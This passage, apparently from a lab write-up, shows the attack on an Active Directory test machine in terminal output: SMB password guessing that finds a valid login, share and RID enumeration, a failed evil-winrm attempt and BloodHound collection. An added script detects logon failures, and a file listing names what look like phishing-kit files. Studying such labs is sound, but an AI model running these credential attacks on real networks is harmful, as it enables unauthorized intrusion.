SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:12345 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:123456789 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:123456789 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:123456789 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:123456789 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:123456789 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:123456789 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:123456789 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:password STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:password STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:password STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:password STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:password STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:password STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:password STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:iloveyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:iloveyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:iloveyou STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:iloveyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:iloveyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:iloveyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:iloveyou STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:princess STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:princess STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:princess STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:princess STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:princess STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:princess STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:princess STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:1234567 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:1234567 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:1234567 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:1234567 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:1234567 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:1234567 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:1234567 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:rockyou STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:rockyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:rockyou STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:rockyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:rockyou STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:rockyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:rockyou STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:12345678 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:12345678 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:12345678 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:12345678 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:12345678 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:12345678 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:12345678 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:abc123 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:abc123 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:abc123 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:abc123 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:abc123 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:abc123 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:abc123 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:nicole STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:nicole STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:nicole STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:nicole STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:nicole STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:nicole STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:nicole STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:daniel STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:daniel STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:daniel STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:daniel STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:daniel STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:daniel STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:daniel STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:babygirl STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:babygirl STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:babygirl STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:babygirl STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:babygirl STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:babygirl STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:babygirl STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:monkey STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:monkey STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:monkey STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:monkey STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:monkey STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:monkey STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:monkey STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:lovely STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:lovely STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:lovely STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:lovely STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:lovely STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:lovely STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:lovely STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:jessica STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:jessica STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:jessica STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:jessica STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:jessica STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:jessica STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:jessica STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:654321 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:654321 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:654321 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:654321 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:654321 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:654321 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:654321 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:michael STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:michael STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:michael STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:michael STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:michael STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:michael STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:michael STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:ashley STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:ashley STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\alfredo:Password1

Now, we have to verify if the password discovered is correct with the command you can see below.
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.7 -u "alfredo" -p "Password1"
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\alfredo:Password1
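From the defender's side, the run above leaves a burst of event 4625 logon failures on the domain controller, and the many passwords tried per account only get through because no lockout threshold stops them. The following added example (not code from the write-up or from netexec) parses constructed 4625 export lines and flags both the spray pattern (many accounts from one source) and the per-account brute force this run actually performs; the export format and thresholds are assumptions.

```python
"""
Detect password spraying and per-account brute force against a DC from
Windows Security event 4625 ("An account failed to log on").

Added example for this write-up, not code from the page or from netexec.
The log lines are CONSTRUCTED in a simple "<timestamp> <eventid> key=value ..."
export format (an assumption; adapt parse_event to your SIEM's export) and
mimic what the netexec run above would leave on CHANGE: network logons
(type 3) over NTLM from 192.168.88.6, the same accounts tried in varying case.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)   # look-back window per source address
SPRAY_MIN_USERS = 4             # distinct accounts failing from one source
BRUTE_MIN_ATTEMPTS = 5          # failures against one account from one source

# Documented 4625 SubStatus value (a real code, not constructed); bad
# password is 0xC000006A, "account does not exist" is the one below.
SUBSTATUS_NO_SUCH_USER = "0xC0000064"

SAMPLE_LOG = """\
2025-06-28T12:10:00Z 4624 TargetUserName=CHANGE$ TargetDomainName=MEGACHANGE IpAddress=192.168.88.7 LogonType=3 AuthenticationPackageName=Kerberos
2025-06-28T12:10:01Z 4625 TargetUserName=alfredo TargetDomainName=megachange.nyx IpAddress=192.168.88.6 LogonType=3 SubStatus=0xC000006A AuthenticationPackageName=NTLM
2025-06-28T12:10:01Z 4625 TargetUserName=administrator TargetDomainName=megachange.nyx IpAddress=192.168.88.6 LogonType=3 SubStatus=0xC000006A AuthenticationPackageName=NTLM
2025-06-28T12:10:02Z 4625 TargetUserName=change TargetDomainName=megachange.nyx IpAddress=192.168.88.6 LogonType=3 SubStatus=0xC0000064 AuthenticationPackageName=NTLM
2025-06-28T12:10:02Z 4625 TargetUserName=Administrator TargetDomainName=megachange.nyx IpAddress=192.168.88.6 LogonType=3 SubStatus=0xC000006A AuthenticationPackageName=NTLM
2025-06-28T12:10:03Z 4625 TargetUserName=Alfredo TargetDomainName=megachange.nyx IpAddress=192.168.88.6 LogonType=3 SubStatus=0xC000006A AuthenticationPackageName=NTLM
2025-06-28T12:10:03Z 4625 TargetUserName=sysadmin TargetDomainName=megachange.nyx IpAddress=192.168.88.6 LogonType=3 SubStatus=0xC000006A AuthenticationPackageName=NTLM
2025-06-28T12:10:04Z 4625 TargetUserName=alfredo TargetDomainName=megachange.nyx IpAddress=192.168.88.6 LogonType=3 SubStatus=0xC000006A AuthenticationPackageName=NTLM
2025-06-28T12:10:05Z 4625 TargetUserName=Change TargetDomainName=megachange.nyx IpAddress=192.168.88.6 LogonType=3 SubStatus=0xC0000064 AuthenticationPackageName=NTLM
2025-06-28T12:10:06Z 4625 TargetUserName=alfredo TargetDomainName=megachange.nyx IpAddress=192.168.88.6 LogonType=3 SubStatus=0xC000006A AuthenticationPackageName=NTLM
2025-06-28T12:10:07Z 4625 TargetUserName=sysadmin TargetDomainName=megachange.nyx IpAddress=192.168.88.6 LogonType=3 SubStatus=0xC000006A AuthenticationPackageName=NTLM
2025-06-28T12:10:08Z 4625 TargetUserName=Alfredo TargetDomainName=megachange.nyx IpAddress=192.168.88.6 LogonType=3 SubStatus=0xC000006A AuthenticationPackageName=NTLM
2025-06-28T12:15:30Z 4625 TargetUserName=sysadmin TargetDomainName=megachange.nyx IpAddress=192.168.88.5 LogonType=3 SubStatus=0xC000006A AuthenticationPackageName=NTLM
"""


def parse_event(line):
    """Parse one export line; return None unless it is a 4625 record."""
    parts = line.split()
    if len(parts) < 2 or parts[1] != "4625":
        return None
    fields = dict(p.split("=", 1) for p in parts[2:] if "=" in p)
    return {
        "time": datetime.fromisoformat(parts[0].replace("Z", "+00:00")),
        # Case-fold: the spray tries "alfredo" and "Alfredo" as separate
        # entries, but to the DC they are one account.
        "user": fields["TargetUserName"].lower(),
        "ip": fields.get("IpAddress", "-"),
        "logon_type": int(fields.get("LogonType", 0)),
        "substatus": fields.get("SubStatus", ""),
    }


def detect_failed_logons(log_text):
    """Return alerts for spray / brute-force bursts, one per (source, kind, account)."""
    events = [e for e in map(parse_event, log_text.splitlines())
              if e and e["logon_type"] == 3]          # network logons only
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_ip[e["ip"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        raised = set()
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward so it spans at most WINDOW
            while evs[end]["time"] - evs[start]["time"] > WINDOW:
                start += 1
            window = evs[start:end + 1]
            per_user = defaultdict(int)
            for e in window:
                per_user[e["user"]] += 1
            unknown = sorted({e["user"] for e in window
                              if e["substatus"] == SUBSTATUS_NO_SUCH_USER})
            if len(per_user) >= SPRAY_MIN_USERS and "spray" not in raised:
                raised.add("spray")
                alerts.append({"ip": ip, "kind": "spray", "users": sorted(per_user),
                               "attempts": len(window), "unknown_users": unknown})
            for user, n in per_user.items():
                if n >= BRUTE_MIN_ATTEMPTS and ("brute", user) not in raised:
                    raised.add(("brute", user))
                    alerts.append({"ip": ip, "kind": "brute_force", "users": [user],
                                   "attempts": n, "unknown_users": unknown})
    return alerts


if __name__ == "__main__":
    for alert in detect_failed_logons(SAMPLE_LOG):
        print(alert)
```

The unknown_users field (SubStatus 0xC0000064) separates name guessing from password guessing, which is why the non-existent "change" account stands out separately from the real ones.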
Let's list what alfredo can reach with --shares, as you can see below. The account has READ on IPC$, NETLOGON and SYSVOL; readable IPC$ is what lets us enumerate domain accounts in the next step.
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.7 -u "alfredo" -p "Password1" --shares
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\alfredo:Password1
SMB         192.168.88.7    445    CHANGE           [*] Enumerated shares
SMB         192.168.88.7    445    CHANGE           Share           Permissions     Remark
SMB         192.168.88.7    445    CHANGE           -----           -----------     ------
SMB         192.168.88.7    445    CHANGE           ADMIN$                          Remote Admin
SMB         192.168.88.7    445    CHANGE           C$                              Default share
SMB         192.168.88.7    445    CHANGE           IPC$            READ            Remote IPC
SMB         192.168.88.7    445    CHANGE           NETLOGON        READ            Logon server share
SMB         192.168.88.7    445    CHANGE           SYSVOL          READ            Logon server share
Now, using that IPC$ access, enumerate the domain accounts with --rid-brute as you can see below; besides alfredo this reveals the sysadmin user, the Administrator and the machine account CHANGE$.
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.7 -u "alfredo" -p "Password1" --shares --rid-brute
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\alfredo:Password1
SMB         192.168.88.7    445    CHANGE           [*] Enumerated shares
SMB         192.168.88.7    445    CHANGE           Share           Permissions     Remark
SMB         192.168.88.7    445    CHANGE           -----           -----------     ------
SMB         192.168.88.7    445    CHANGE           ADMIN$                          Remote Admin
SMB         192.168.88.7    445    CHANGE           C$                              Default share
SMB         192.168.88.7    445    CHANGE           IPC$            READ            Remote IPC
SMB         192.168.88.7    445    CHANGE           NETLOGON        READ            Logon server share
SMB         192.168.88.7    445    CHANGE           SYSVOL          READ            Logon server share
SMB         192.168.88.7    445    CHANGE           498: MEGACHANGE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           500: MEGACHANGE\Administrator (SidTypeUser)
SMB         192.168.88.7    445    CHANGE           501: MEGACHANGE\Guest (SidTypeUser)
SMB         192.168.88.7    445    CHANGE           502: MEGACHANGE\krbtgt (SidTypeUser)
SMB         192.168.88.7    445    CHANGE           512: MEGACHANGE\Domain Admins (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           513: MEGACHANGE\Domain Users (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           514: MEGACHANGE\Domain Guests (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           515: MEGACHANGE\Domain Computers (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           516: MEGACHANGE\Domain Controllers (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           517: MEGACHANGE\Cert Publishers (SidTypeAlias)
SMB         192.168.88.7    445    CHANGE           518: MEGACHANGE\Schema Admins (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           519: MEGACHANGE\Enterprise Admins (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           520: MEGACHANGE\Group Policy Creator Owners (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           521: MEGACHANGE\Read-only Domain Controllers (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           522: MEGACHANGE\Cloneable Domain Controllers (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           525: MEGACHANGE\Protected Users (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           526: MEGACHANGE\Key Admins (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           527: MEGACHANGE\Enterprise Key Admins (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           553: MEGACHANGE\RAS and IAS Servers (SidTypeAlias)
SMB         192.168.88.7    445    CHANGE           571: MEGACHANGE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         192.168.88.7    445    CHANGE           572: MEGACHANGE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         192.168.88.7    445    CHANGE           1000: MEGACHANGE\CHANGE$ (SidTypeUser)
SMB         192.168.88.7    445    CHANGE           1101: MEGACHANGE\DnsAdmins (SidTypeAlias)
SMB         192.168.88.7    445    CHANGE           1102: MEGACHANGE\DnsUpdateProxy (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           1103: MEGACHANGE\alfredo (SidTypeUser)
SMB         192.168.88.7    445    CHANGE           1104: MEGACHANGE\sysadmin (SidTypeUser)
The most important part is to check whether this account can actually get a shell on the machine. With netexec the protocol comes first, so the WinRM check is:
  • netexec winrm 192.168.88.7 -u 'alfredo' -p 'Password1'
Note that the command actually run below, netexec smb evil-winrm 192.168.88.7 ..., passes evil-winrm as a second SMB target instead of selecting the WinRM protocol, which is why netexec reports running against 2 targets; it only re-confirms the SMB login and says nothing about WinRM.
┌──(root㉿kali)-[/home/luis]
└─# netexec smb evil-winrm 192.168.88.7 -u "alfredo" -p "Password1"
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\alfredo:Password1
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Now let's try to get a shell on the Windows machine with evil-winrm:
  • evil-winrm -i 192.168.88.7 -u 'alfredo' -p 'Password1'
With alfredo we cannot get in: the connection ends with WinRMAuthorizationError, as you can see below. Since the password is valid over SMB, the most likely reason is that this user lacks remote-management rights (membership in Remote Management Users or local Administrators).
┌──(root㉿kali)-[/home/luis]
└─# evil-winrm -i 192.168.88.7 -u "alfredo" -p "Password1"

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
Next, we need BloodHound.py, which is checked out at /home/luis/Descargas/BloodHound.py, as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# cd Descargas

┌──(root㉿kali)-[/home/luis/Descargas]
└─# ls
BloodHound.py                        m365_gophish_landing                   ngrok_recovery_codes.txt
email_template_ngrok_microsoft.html  m365_gophish_landing.zip               setup_nophish_365.sh
httrack_index_with_form.html         m365_landing_final.html                SharpHound_v2.6.7_windows_x86
kerbrute_linux_386                   m365_login_gophish.html                SharpHound_v2.6.7_windows_x86.zip
landing_page_ngrok_microsoft.html    microsoft365_no_background.html        Spotify-Premium-File-Spotifyinfo.app.apk
m365_capture_and_redirect.html       microsoft365_phishing_simulation.html  twilio_2FA_recovery_code.txt

┌──(root㉿kali)-[/home/luis/Descargas]
└─# cd BloodHound.py
Now run python3 bloodhound.py to collect information about the domain; first, use the -h option to see which options we need.
┌──(root㉿kali)-[/home/luis/Descargas/BloodHound.py]
└─# ls
bloodhound  bloodhound.py  createforestcache.py  Dockerfile  LICENSE  README.md  setup.py

┌──(root㉿kali)-[/home/luis/Descargas/BloodHound.py]
└─# python3 bloodhound.py -h   
usage: bloodhound.py [-h] [-c COLLECTIONMETHOD] [-d DOMAIN] [-v] [-u USERNAME] [-p PASSWORD] [-k] [--hashes HASHES]
                     [-no-pass] [-aesKey hex key] [--auth-method {auto,ntlm,kerberos}] [-ns NAMESERVER] [--dns-tcp]
                     [--dns-timeout DNS_TIMEOUT] [-dc HOST] [-gc HOST] [-w WORKERS] [--exclude-dcs] [--disable-pooling]
                     [--disable-autogc] [--zip] [--computerfile COMPUTERFILE] [--cachefile CACHEFILE]
                     [--ldap-channel-binding] [--use-ldaps] [-op PREFIX_NAME]

Python based ingestor for BloodHound LEGACY
For help or reporting issues, visit https://github.com/dirkjanm/BloodHound.py

options:
  -h, --help            show this help message and exit
  -c, --collectionmethod COLLECTIONMETHOD
                        Which information to collect. Supported: Group, LocalAdmin, Session, Trusts, Default (all previous),
                        DCOnly (no computer connections), DCOM, RDP,PSRemote, LoggedOn, Container, ObjectProps, ACL, All
                        (all except LoggedOn). You can specify more than one by separating them with a comma. (default:
                        Default)
  -d, --domain DOMAIN   Domain to query.
  -v                    Enable verbose output

authentication options:
  Specify one or more authentication options. 
  By default Kerberos authentication is used and NTLM is used as fallback. 
  Kerberos tickets are automatically requested if a password or hashes are specified.

  -u, --username USERNAME
                        Username. Format: username[@domain]; If the domain is unspecified, the current domain is used.
  -p, --password PASSWORD
                        Password
  -k, --kerberos        Use kerberos ccache file
  --hashes HASHES       LM:NLTM hashes
  -no-pass              don't ask for password (useful for -k)
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  --auth-method {auto,ntlm,kerberos}
                        Authentication methods. Force Kerberos or NTLM only or use auto for Kerberos with NTLM fallback

collection options:
  -ns, --nameserver NAMESERVER
                        Alternative name server to use for queries
  --dns-tcp             Use TCP instead of UDP for DNS queries
  --dns-timeout DNS_TIMEOUT
                        DNS query timeout in seconds (default: 3)
  -dc, --domain-controller HOST
                        Override which DC to query (hostname)
  -gc, --global-catalog HOST
                        Override which GC to query (hostname)
  -w, --workers WORKERS
                        Number of workers for computer enumeration (default: 10)
  --exclude-dcs         Skip DCs during computer enumeration
  --disable-pooling     Don't use subprocesses for ACL parsing (only for debugging purposes)
  --disable-autogc      Don't automatically select a Global Catalog (use only if it gives errors)
  --zip                 Compress the JSON output files into a zip archive
  --computerfile COMPUTERFILE
                        File containing computer FQDNs to use as allowlist for any computer based methods
  --cachefile CACHEFILE
                        Cache file (experimental)
  --ldap-channel-binding
                        Use LDAP Channel Binding (will force ldaps protocol to be used)
  --use-ldaps           Use LDAP over TLS on port 636 by default
  -op, --outputprefix PREFIX_NAME
                        String to prepend to output file names
Then run the collector with the options below (-c all collects every method except LoggedOn, -ns points its DNS lookups at the DC, --zip bundles the JSON output). In the output, note that the Kerberos TGT request fails because change.megachange.nyx does not resolve through the Kali host's own resolver, so the tool falls back to NTLM; adding the DC to /etc/hosts would let Kerberos work.
  • python3 bloodhound.py -u alfredo -p Password1 -ns 192.168.88.7 -d megachange.nyx -c all --zip
┌──(root㉿kali)-[/home/luis/Descargas/BloodHound.py]
└─# python3 bloodhound.py -u alfredo -p Password1 -ns 192.168.88.7 -d megachange.nyx -c all --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: megachange.nyx
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (change.megachange.nyx:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: change.megachange.nyx
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: change.megachange.nyx
INFO: Found 6 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CHANGE.megachange.nyx
INFO: Done in 00M 01S
